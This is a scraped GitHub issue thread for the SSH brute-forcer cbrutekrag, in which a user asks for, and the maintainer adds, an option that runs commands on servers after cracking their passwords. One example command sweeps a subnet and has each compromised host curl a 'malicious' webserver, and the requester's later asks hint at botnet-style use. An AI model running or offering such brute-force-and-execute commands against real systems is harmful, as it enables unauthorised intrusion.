Comments (14)
I will work on it. But, it isn't the main purpose of this tool.
I wrote this tool to help to test ssh servers against weak passwords, no more.
It's ok :) . The main reason I / we ask you for this upgrade is to test our servers agains ssh / remote attacks. As we traveled over the internet, we found cbrutekrag, which is the most acurate bf atm.
We've managed to secure ourselves agains TSM,ANCKOn , etc.
Upgrading remote cmd option, will help testing all the vulnerabilities in 1 command.
Thanks a million !
from cbrutekrag.
int main(int argc, char ** argv)
{
if(argc<7)
{
cerr << "Parameters: num-thread username-list.txt host passwd-list.txt port command" << endl;
exit(0);
}
signal(SIGINT,quit);
startTime = clock();
enabled_sem= true;
MAX_THREAD = atoi(argv[1]);
username = argv[2];
host = argv[3];
passwd = argv[4];
port = argv[5];
command = argv[6];
i guess this is the thing
from cbrutekrag.
cbrutekrag uses libssh, so the correct way to execute remote commands will be something like this:
- First create a channel
- Open a session
- Then send command using
ssh_channel_request_exec
from cbrutekrag.
"cbrutekrag uses libssh, so the correct way to execute remote commands will be something like this:
First create a channel
Open a session
Then send command using ssh_channel_request_exec "
So, it means you cannot execute a remote command directly from the main running command ?
so all of this would look like
cbrutekrag arg arg arg -execute -rm etc... arg -p 22 ? i wrote arg as an example of options.
the main thing i'm interested in, is to execute a remote command directly from cbrutekrag . i'm waiting with my fingers crossed :D thanks a million !
from cbrutekrag.
from cbrutekrag.
I will work on it. But, it isn't the main purpose of this tool.
I wrote this tool to help to test ssh servers against weak passwords, no more.
from cbrutekrag.
I've been committed these changes to "feature/remote-command-execution" branch.
Can you test it and give me feedback?
Thanks in advance
from cbrutekrag.
I'm more then grateful for your drive and knowledge ! I'll try it in a moment !
from cbrutekrag.
ooh. i've managed to make it work. let me check now :D sorry for delay
from cbrutekrag.
Ok, i made all the tests but the -x command isn't actually working. It looks like it's working but won't execute the command.
from cbrutekrag.
@metadone666 You're sure about the command isn't executed?
I think that the command is executed on the remote host but doesn't reads the response, because I've implements only the send, but not yet the receive.
Can you send me via email some examples of parameters that you've used?
I've tried something like this:
cbrutekrag -sp 2222 -t 12 -X 'curl http://192.168.100.6/test.txt' 192.168.100.0/24
(Where 192.168.100.6 is a "malicious" webserver, and 192.168.100.0/24 the range where we will look for SSH servers listening on port 2222)
Then, I've noticed that the request is present on webserver's access log, so I've deducted that the command has worked.
I've not tested yet with long-running commands or scripts.
from cbrutekrag.
Ok, i made all the tests but the -x command isn't actually working. It looks like it's working but won't execute the command.
Note that you must use -X (uppercase) as argument
from cbrutekrag.
@metadone666 You're sure about the command isn't executed?
I think that the command is executed on the remote host but doesn't reads the response, because I've implements only the send, but not yet the receive.
Can you send me via email some examples of parameters that you've used?I've tried something like this:
cbrutekrag -sp 2222 -t 12 -X 'curl http://192.168.100.6/test.txt' 192.168.100.0/24
(Where 192.168.100.6 is a "malicious" webserver, and 192.168.100.0/24 the range where we will look for SSH servers listening on port 2222)
Then, I've noticed that the request is present on webserver's access log, so I've deducted that the command has worked.
I've not tested yet with long-running commands or scripts.
Hello, brother !
I've sent you an email with an example of parameters i've used with cbrutekrag.
Thank you for your focus !
from cbrutekrag.
@metadone666 You're sure about the command isn't executed?
I think that the command is executed on the remote host but doesn't reads the response, because I've implements only the send, but not yet the receive.
Can you send me via email some examples of parameters that you've used?
I've tried something like this:
cbrutekrag -sp 2222 -t 12 -X 'curl http://192.168.100.6/test.txt' 192.168.100.0/24
(Where 192.168.100.6 is a "malicious" webserver, and 192.168.100.0/24 the range where we will look for SSH servers listening on port 2222)
Then, I've noticed that the request is present on webserver's access log, so I've deducted that the command has worked.
I've not tested yet with long-running commands or scripts.Hello, brother !
I've sent you an email with an example of parameters i've used with cbrutekrag.
Thank you for your focus !
Also, there's a small upgrade that would be awesome. if there's is any possibility to add the option "uname -a" as -u so it will automatically do the uname and -X will be an optional but i guess this will require an auto proxy generator
from cbrutekrag.
Related Issues (20)
- SIGSEGV when combinations file has empty lines
- Progress bar bug HOT 2
- Add option to output -s (Scan) results HOT 4
- *** buffer overflow detected ***: terminated HOT 7
- 2 more options required HOT 1
- Detect SonicWall SSH HOT 4
- Static Compile issue HOT 4
- multiple successful results with the same IP address, HOT 13
- static build compile error...help HOT 2
- check your email! :) HOT 1
- Option to only scan good IPs and other option to export good IPs while running brute forcing to a new file (different with ouput file). Specs grabber HOT 1
- Support for use hostname as password HOT 4
- Save only format ip|user|pass
- Implement Command Execution - Output HOT 11
- Support for port on the targets list HOT 13
- Port ranges HOT 1
- Build failing on Debian 7 and Debian 8 i386 HOT 2
- Implement Fake Process HOT 5
- Accept targets from STDIN
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cbrutekrag.